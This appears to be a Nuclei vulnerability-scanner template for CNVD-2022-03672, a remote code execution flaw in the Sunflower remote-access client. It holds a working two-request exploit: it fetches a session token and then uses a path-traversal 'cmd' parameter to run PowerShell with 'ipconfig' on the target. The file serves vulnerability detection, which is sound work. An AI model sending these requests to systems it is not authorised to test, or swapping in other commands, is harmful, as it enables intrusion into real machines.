id: CNVD-2022-03672 info: name: Sunflower Simple and Personal edition RCE author: daffainfo severity: critical reference: - https://www.1024sou.com/article/741374.html - https://copyfuture.com/blogs-details/202202192249158884 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 tags: cnvd,cnvd2020,sunflower,rce requests: - raw: - | POST /cgi-bin/rpc HTTP/1.1 Host: {{Hostname}} action=verify-haras - | GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 Host: {{Hostname}} Cookie: CID={{cid}} extractors: - type: regex name: cid internal: true group: 1 regex: - '"verify_string":"(.*)"' req-condition: true matchers: - type: dsl dsl: - "status_code_1==200" - "status_code_2==200" - "contains(body_1, 'verify_string')" - "contains(body_2, 'Windows IP')" condition: and